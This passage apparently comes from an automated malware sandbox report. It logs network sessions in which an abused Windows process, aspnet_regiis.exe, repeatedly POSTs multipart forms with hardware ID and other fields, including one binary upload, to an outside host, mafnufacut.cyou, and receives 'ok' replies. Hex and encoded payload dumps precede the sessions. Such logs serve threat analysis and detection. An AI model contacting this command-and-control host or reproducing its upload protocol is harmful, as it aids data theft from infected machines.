                                                                          Data Ascii: yo5NHQqmWc2mbuPQsOj1s7LXW3rrc+i6DWs0OWMBKqUmnmUVMstBsIIb94SVzaSCg8pbSqJiiaaFY2Ap0zlyqB7/TUAW42ix/wv/2KHFjJOCu09u72fAvj1LCD1vMTaVLoJpOV63TajWIuL1gfX1suPzgxafJ7Gu7XMAHXNsNvAm53U5J/44sLIL09Ch8YSTvs9/HsdT0O4lfxwdUwUSuQK2WQ0i70W1nzLj0ODo9bNas29me0/YgzkCAEBvKQe
                                                                          2024-10-31 13:06:59 UTC1369INData Raw: 53 45 75 77 31 32 67 69 68 2f 7a 30 4a 48 78 71 62 4b 37 38 30 63 33 77 67 4c 6f 47 71 57 71 4d 4b 47 47 4e 55 75 31 65 34 4a 70 46 42 65 65 57 59 43 53 4f 38 50 77 6d 63 32 6b 6d 36 62 66 61 33 72 54 55 38 79 79 49 58 73 73 4d 57 73 6c 42 71 55 47 6a 6e 6b 5a 4b 73 4e 34 73 61 63 4c 2f 36 32 41 69 4a 51 6e 33 74 39 6a 54 38 4d 65 30 4d 4d 35 59 77 6b 6b 44 6a 55 47 71 51 61 61 59 52 55 53 35 33 6d 6b 76 68 76 6e 31 4a 6e 6c 71 4b 4f 57 39 32 64 47 38 31 76 41 6f 6a 31 50 46 42 6c 44 49 44 65 30 48 70 34 55 4a 48 66 2f 6e 62 7a 47 56 36 50 39 67 5a 53 73 31 6f 4c 76 61 6c 65 69 59 2b 7a 75 45 56 63 41 4d 56 4d 68 4f 72 45 43 74 6d 30 56 50 74 74 35 71 4b 49 76 71 38 43 78 30 59 69 4c 73 73 74 76 66 73 39 57 36 5a 38 35 59 31 6b 6b 44 6a 57 47 6b 53 6f 36
                                                                          Data Ascii: SEuw12gih/z0JHxqbK780c3wgLoGqWqMKGGNUu1e4JpFBeeWYCSO8Pwmc2km6bfa3rTU8yyIXssMWslBqUGjnkZKsN4sacL/62AiJQn3t9jT8Me0MM5YwkkDjUGqQaaYRUS53mkvhvn1JnlqKOW92dG81vAoj1PFBlDIDe0Hp4UJHf/nbzGV6P9gZSs1oLvaleiY+zuEVcAMVMhOrECtm0VPtt5qKIvq8Cx0YiLsstvfs9W6Z85Y1kkDjWGkSo6
                                                                          2024-10-31 13:06:59 UTC1369INData Raw: 64 4e 2b 4e 63 4b 32 73 79 64 69 4a 58 53 67 69 74 48 46 6f 4e 75 34 47 4a 68 63 32 41 4a 57 77 51 32 38 43 62 6e 64 54 6b 6e 2f 6a 69 77 68 6a 66 48 77 4c 33 74 73 49 4f 32 35 33 39 43 78 33 76 34 6a 68 46 2f 49 44 31 72 49 52 36 42 47 71 70 52 4f 54 62 6a 56 66 6d 66 4d 75 50 51 34 4f 6a 31 73 79 62 76 45 32 36 43 59 35 57 65 58 48 38 6b 46 47 35 55 4e 70 30 32 76 6d 55 35 4a 75 64 4e 71 4b 6f 50 33 38 69 42 31 59 53 66 70 75 74 66 59 74 64 58 2b 4f 34 52 55 77 51 56 53 77 55 44 6a 43 65 43 61 55 51 58 6e 6c 6c 30 71 6a 50 62 30 4e 6a 70 36 59 76 6e 38 30 64 6e 77 67 4c 6f 6f 67 6c 44 4e 42 6c 6a 4f 54 4b 6c 56 73 70 46 41 54 62 72 61 5a 79 6d 45 36 76 55 76 63 32 59 76 36 62 76 65 32 62 72 62 2f 57 6e 41 48 38 6b 52 47 35 55 4e 67 46 43 77 6b 41 6c 61
                                                                          Data Ascii: dN+NcK2sydiJXSgitHFoNu4GJhc2AJWwQ28CbndTkn/jiwhjfHwL3tsIO2539Cx3v4jhF/ID1rIR6BGqpROTbjVfmfMuPQ4Oj1sybvE26CY5WeXH8kFG5UNp02vmU5JudNqKoP38iB1YSfputfYtdX+O4RUwQVSwUDjCeCaUQXnll0qjPb0Njp6Yvn80dnwgLooglDNBljOTKlVspFATbraZymE6vUvc2Yv6bve2brb/WnAH8kRG5UNgFCwkAla
                                                                          2024-10-31 13:06:59 UTC1369INData Raw: 47 4c 2f 76 51 6d 64 48 63 70 35 72 50 5a 33 4c 6e 63 38 69 71 4f 57 38 6f 4f 58 73 35 42 71 45 43 6a 6b 6b 31 4d 73 64 39 6a 5a 38 79 34 39 44 67 36 50 57 7a 42 70 39 58 5a 76 5a 6a 6c 5a 35 63 66 79 51 55 62 6c 51 32 76 53 61 57 64 51 30 4f 37 30 32 6f 74 68 2f 6a 34 49 33 56 68 4b 75 53 7a 31 74 36 35 32 66 77 73 68 46 54 49 42 46 6a 4c 53 2b 4d 4a 34 4a 70 52 42 65 65 57 54 44 79 50 39 50 52 67 5a 53 73 31 6f 4c 76 61 6c 65 69 59 38 53 57 4b 57 4d 34 45 57 4d 56 49 70 30 32 6c 6e 55 46 58 74 39 5a 72 4e 5a 44 34 2b 69 56 32 5a 69 7a 6b 75 74 2f 54 73 39 79 36 5a 38 35 59 31 6b 6b 44 6a 57 43 76 51 49 6d 61 55 67 57 67 6d 48 56 6e 68 66 53 7a 65 44 70 6b 4a 2b 71 7a 32 39 61 32 32 2f 45 73 68 46 37 4a 41 56 62 66 54 71 78 49 70 4a 31 47 51 37 6e 58 59
                                                                          Data Ascii: GL/vQmdHcp5rPZ3Lnc8iqOW8oOXs5BqECjkk1Msd9jZ8y49Dg6PWzBp9XZvZjlZ5cfyQUblQ2vSaWdQ0O702oth/j4I3VhKuSz1t652fwshFTIBFjLS+MJ4JpRBeeWTDyP9PRgZSs1oLvaleiY8SWKWM4EWMVIp02lnUFXt9ZrNZD4+iV2Zizkut/Ts9y6Z85Y1kkDjWCvQImaUgWgmHVnhfSzeDpkJ+qz29a22/EshF7JAVbfTqxIpJ1GQ7nXY
                                                                          2024-10-31 13:06:59 UTC1369INData Raw: 4e 48 6c 31 2f 49 65 61 72 78 2b 75 4f 33 2b 41 6b 69 45 6a 66 52 55 37 4f 51 36 31 41 74 74 30 48 42 62 43 57 4e 42 37 43 73 4c 4d 66 4e 43 55 30 6f 4f 53 57 34 4c 50 57 39 43 36 59 54 6f 4d 75 51 63 42 4c 74 46 62 67 30 77 6c 44 2f 34 34 38 61 63 4c 38 34 6d 41 69 4e 58 36 37 36 59 57 43 34 49 72 6c 5a 35 63 66 32 45 6b 44 6e 77 50 6a 56 65 44 46 43 51 4b 38 78 48 34 68 67 65 37 77 5a 30 52 62 41 75 65 36 30 39 4b 67 6d 74 51 69 6d 6c 69 4f 52 78 76 43 44 66 74 2b 34 4e 55 4a 65 76 47 57 64 47 66 61 75 4d 59 6a 64 47 73 72 39 71 32 62 2b 37 66 65 2f 79 36 65 48 65 41 43 54 38 6f 4e 37 51 65 6d 33 52 45 56 38 5a 5a 6f 4e 73 4b 67 6f 33 49 68 4d 48 2b 33 37 49 54 4b 2f 73 47 36 50 38 34 48 6e 45 63 62 33 77 33 37 42 2b 65 65 57 31 65 35 31 58 6f 6b 78 63
                                                                          Data Ascii: NHl1/Iearx+uO3+AkiEjfRU7OQ61Att0HBbCWNB7CsLMfNCU0oOSW4LPW9C6YToMuQcBLtFbg0wlD/448acL84mAiNX676YWC4IrlZ5cf2EkDnwPjVeDFCQK8xH4hge7wZ0RbAue609KgmtQimliORxvCDft+4NUJevGWdGfauMYjdGsr9q2b+7fe/y6eHeACT8oN7Qem3REV8ZZoNsKgo3IhMH+37ITK/sG6P84HnEcb3w37B+eeW1e51Xokxc
                                                                          2024-10-31 13:06:59 UTC1369INData Raw: 4a 52 4f 75 2f 4d 36 56 36 4a 6a 50 4b 6f 42 52 79 52 39 4b 67 47 71 74 51 4b 47 4c 57 56 4b 77 6d 55 49 52 6f 37 69 39 59 48 77 6c 64 4c 4c 79 6c 74 47 68 6d 4b 4a 35 33 41 53 62 57 67 79 64 48 37 77 4a 75 64 31 66 42 65 65 45 49 6d 65 51 75 4b 74 67 50 57 59 2b 38 72 72 56 77 37 4f 66 78 42 65 70 55 63 6b 49 54 64 31 41 72 32 61 6a 6a 45 4e 37 67 63 4e 76 4b 59 7a 2f 35 54 45 36 4b 32 7a 76 2f 49 37 73 38 4a 43 36 46 73 41 66 31 6b 6b 44 6a 58 69 67 53 61 36 61 58 31 54 79 38 57 49 67 67 2b 37 6a 4c 58 5a 45 4c 2f 47 32 6c 70 76 77 33 72 70 78 33 42 47 4f 44 55 71 4e 46 66 4d 56 2b 38 67 61 45 75 2b 45 63 32 6d 62 75 4f 56 67 49 6a 64 69 6f 4b 36 57 6a 66 43 66 2b 54 75 63 57 63 30 66 57 49 70 7a 6e 57 4b 33 6e 6c 6c 44 76 4f 68 53 44 49 37 2b 39 44 70
                                                                          Data Ascii: JROu/M6V6JjPKoBRyR9KgGqtQKGLWVKwmUIRo7i9YHwldLLyltGhmKJ53ASbWgydH7wJud1fBeeEImeQuKtgPWY+8rrVw7OfxBepUckITd1Ar2ajjEN7gcNvKYz/5TE6K2zv/I7s8JC6FsAf1kkDjXigSa6aX1Ty8WIgg+7jLXZEL/G2lpvw3rpx3BGODUqNFfMV+8gaEu+Ec2mbuOVgIjdioK6WjfCf+TucWc0fWIpznWK3nllDvOhSDI7+9Dp
                                                                          2024-10-31 13:06:59 UTC1369INData Raw: 70 6e 73 6c 34 48 4f 2b 53 6d 41 57 49 35 48 47 39 55 4e 2b 77 65 4e 6a 30 35 56 76 4a 52 4a 48 63 44 4a 35 53 4e 36 61 79 75 67 6f 35 6a 4d 38 4d 36 36 63 64 30 52 6a 68 73 62 6c 51 33 6b 53 61 32 63 53 6b 75 38 78 48 34 68 67 65 37 77 5a 30 52 62 41 2b 75 39 78 74 69 68 31 66 34 2f 73 47 48 70 44 31 37 4b 63 35 31 77 73 5a 70 5a 42 35 6e 56 65 69 54 43 74 72 4d 34 4f 6a 31 73 78 37 72 54 30 76 43 57 75 69 33 4f 42 34 34 6d 55 4d 78 64 72 6c 61 74 6d 56 38 48 6d 4e 42 70 49 4d 4b 32 73 79 77 36 50 57 7a 76 72 64 48 54 74 64 2b 32 4c 70 52 59 6a 6b 63 62 77 77 33 37 42 36 2b 4d 54 6b 4f 36 30 53 41 68 6a 50 61 7a 50 7a 52 38 62 50 62 38 6a 6f 62 2b 6d 4f 68 70 31 68 2b 4a 42 31 62 4d 54 71 31 45 73 6f 39 50 52 71 6e 56 4b 78 6d 38 32 4f 4d 6a 62 6d 49 64
                                                                          Data Ascii: pnsl4HO+SmAWI5HG9UN+weNj05VvJRJHcDJ5SN6ayugo5jM8M66cd0RjhsblQ3kSa2cSku8xH4hge7wZ0RbA+u9xtih1f4/sGHpD17Kc51wsZpZB5nVeiTCtrM4Oj1sx7rT0vCWui3OB44mUMxdrlatmV8HmNBpIMK2syw6PWzvrdHTtd+2LpRYjkcbww37B6+MTkO60SAhjPazPzR8bPb8job+mOhp1h+JB1bMTq1Eso9PRqnVKxm82OMjbmId


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.649714104.21.41.1584432096C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-31 13:07:00 UTC281OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 12866
                                                                          Host: mafnufacut.cyou
                                                                          2024-10-31 13:07:00 UTC12866OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7DEA0A49D8D68686C58ADC3142F6BB48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--17a95
                                                                          2024-10-31 13:07:01 UTC1014INHTTP/1.1 200 OK
                                                                          Date: Thu, 31 Oct 2024 13:07:01 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=6u37fl4q5timu7d9skslbrtdc2; expires=Mon, 24-Feb-2025 06:53:40 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPP1h%2Bj%2FFczkVUYBruOS4moQHKpeskdGV5TUf8BRlQoMgaaV0UGJ6QK3b0jPS9tpSgv4hqTyWto11ri3MfWDb47U1jwOspFC1MgVImRpiiOye8LR3%2FCNNfBtE1K%2BIgo6JGQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8db3dd997b6b2e24-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2124&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13805&delivery_rate=1324188&cwnd=251&unsent_bytes=0&cid=6647bd752be0e340&ts=702&x=0"
                                                                          2024-10-31 13:07:01 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.77
                                                                          2024-10-31 13:07:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.649715104.21.41.1584432096C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-31 13:07:02 UTC281OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 15112
                                                                          Host: mafnufacut.cyou
                                                                          2024-10-31 13:07:02 UTC15112OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7DEA0A49D8D68686C58ADC3142F6BB48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--17a95
                                                                          2024-10-31 13:07:02 UTC1008INHTTP/1.1 200 OK
                                                                          Date: Thu, 31 Oct 2024 13:07:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=lod12vhhkfdtlrflq7ml9p7uif; expires=Mon, 24-Feb-2025 06:53:41 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vCMinFJVNS04lPN1cGytuluOEjRZGFGsr2z6hjWZxfm8vMJXt2MDHMBncceHsbKbO1YLbvCw0glqLvqryhFWFUPtTsVPiYgpxaQ7%2B4Zd49td3svDAqO3kteUfyFPCSeP8Js%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8db3dda25b4c2e2a-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16051&delivery_rate=2086455&cwnd=234&unsent_bytes=0&cid=15a70c71b94f3e98&ts=398&x=0"
                                                                          2024-10-31 13:07:02 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.77
                                                                          2024-10-31 13:07:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.649716104.21.41.1584432096C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-31 13:07:03 UTC281OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 19970
                                                                          Host: mafnufacut.cyou
                                                                          2024-10-31 13:07:03 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7DEA0A49D8D68686C58ADC3142F6BB48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--17a95
                                                                          2024-10-31 13:07:03 UTC4639OUTData Raw: bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b
                                                                          Data Ascii: 2+?2+?2+?o?Mp5
                                                                          2024-10-31 13:07:04 UTC1017INHTTP/1.1 200 OK
                                                                          Date: Thu, 31 Oct 2024 13:07:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=ds2mf8p1b96770sgt42lc5ee3l; expires=Mon, 24-Feb-2025 06:53:42 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo47zpZQqneBjCW%2FrueMktRguGkNpivEH8Bjf%2FKiuxjDYAfqG4TKkAstE99cuog9VyZl2Wl7yv57vX3Mby1Hy40mbed0K4GRON4NZKo0bERTI5A%2BCY%2BcE%2BDrrPWMNKEJREc%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8db3ddaaf999eaee-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1102&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=20931&delivery_rate=2393388&cwnd=251&unsent_bytes=0&cid=3cc999abecb9714b&ts=636&x=0"
                                                                          2024-10-31 13:07:04 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.77
                                                                          2024-10-31 13:07:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.649718104.21.41.1584432096C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-31 13:07:05 UTC280OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 1241
                                                                          Host: mafnufacut.cyou
                                                                          2024-10-31 13:07:05 UTC1241OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7DEA0A49D8D68686C58ADC3142F6BB48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--17a95
                                                                          2024-10-31 13:07:05 UTC1014INHTTP/1.1 200 OK
                                                                          Date: Thu, 31 Oct 2024 13:07:05 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=dpq590j34kqajst8sgc77vincr; expires=Mon, 24-Feb-2025 06:53:44 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7g9VpHm5sWaNKBQ7Eks2uiJMG90P%2FwaZ4WJCpiAcn294pjl%2BoSHHLv6WgQJZoNsMa8nML6ey8tT4%2B8zCMxDwV7N%2FnhbBkwjg%2FZiHSZuBcBGgxN8zl38IlTEkYzH2MIiaBk%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8db3ddb6fdd22cdb-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1863&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2157&delivery_rate=1457473&cwnd=251&unsent_bytes=0&cid=25bbe67ebcf82ce1&ts=718&x=0"
                                                                          2024-10-31 13:07:05 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.77
                                                                          2024-10-31 13:07:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.649724104.21.41.1584432096C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-31 13:07:06 UTC280OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 1142
                                                                          Host: mafnufacut.cyou
